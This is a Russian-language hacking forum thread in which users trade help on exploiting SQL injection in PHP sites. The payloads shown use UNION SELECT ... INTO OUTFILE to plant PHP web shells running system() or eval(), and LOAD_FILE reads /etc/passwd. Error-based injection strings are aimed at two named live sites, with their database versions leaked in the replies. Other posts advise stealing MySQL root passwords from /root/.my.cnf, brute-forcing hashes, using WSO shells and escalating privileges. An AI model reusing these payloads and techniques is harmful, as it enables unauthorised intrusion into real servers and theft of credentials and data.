помогите составить запрос заливки файла(имею file_priv=Y) есть уязвимый пхп скрипт(sql inj) id=x структура запросса: SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id При запросе: id=9999+union+select+1,2,3-- ошибка: SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed вывод в 1 столбец пишу 9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается Как правильно составить запрос?
может кавычки фильтруются? у меня так работало вроде: PHP: select '<?php eval($_REQUEST[cmd]); ?>' into outfile '/home/cdut/domains/sss/htdocs/phpmyadmin/1.php'
раскрутил double blind inj на 1 сайтике, сбрутил имена всех доступных баз данных, среди них есть и mysql. file_priv соответственно тоже есть. Пути никакие вообще не знаю, локального инклюда нету, скан портов на предмет сервака баз данных ничего хорошего не сказал. Что сделать можно, кроме как брутить путь к конфигурационным файлам апача? А то что-то нет никакого желания брутить строки через двойную слепоту...
UP ковычки не фильтруются 9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/* файл не записывается и вылазит ошибка QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER! Запрос: 9999+select+'<?php%20eval($_REQUEST[cmd]);%20?>'+into+outfile+'/х/х/х/х/х/х/1.php'--+ Тоже файл не записывается и ошибка: QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
запрос 9999+union+select+'1',2,3--+ выводит в столбец просто 1 думаю ,что mq=off т.к. запрос 9999+union+select+LOAD_FILE('/etc/passwd'),2,3--+ выполняется успешно и выводится этот файл. Я вот подумал может нету прав у юзера на котором мускул запушен на запись в диру которую я ему подсовываю?как это можно провирить проверить?и как действовать в таком случае? ЧТО Я ИМЕЮ: 1.Доступ ко всем бд серва(там есть Пхпадмин и таблица psa-похоже ,что это типо cpanel ,но адрес их адреса найти не удалось ровно также как и определить хостинг сайта) 2.Соответственно могу читать файлы. 3.На борту есть форум пхпбб, но в его дб не удалось обнаружить таблиц с юзерами(видать кудато в другое место пишутся)пытался прочитать скрипт реги ,но куда пишутся юзеры так и не обнаружил.
"blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.
А такую уязвимость вообще реально раскрутить? https://p-on.ru/admin/ и http://www.alarmtrade.ru/search/?search=UNION+SELECT+ids+FROM+pages+WHER' Хотелось бы знать как.
по поводу p-on.ru: в поле логин: ' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))#) message: Duplicate entry '5.0.45-community-nt' for key 1 по поводу: alarmtrade.ru: Code: http://www.alarmtrade.ru/search/?search='or(1)group/**/by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+ Duplicate entry '5.1.58' for key 'group_key'
Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом. И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404 UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?
вообще-то самый высокий уровень нулевой, а никак не 20 по сабжу, пароль от мюскл можно узнать в трех случаях: имея рута на сервере и как правило пароль лежит тут: /root/.my.cnf имея логин и пароль пользователя который не ограничен доступом в mysql.user, достал хеш рута => брут => профит найти пароль в конфигах, логах, процессах
WendM Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую. НО нужно еще пасс расшифровать. Или как писали если есть возможность заюзать сплоит и повысить права
Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки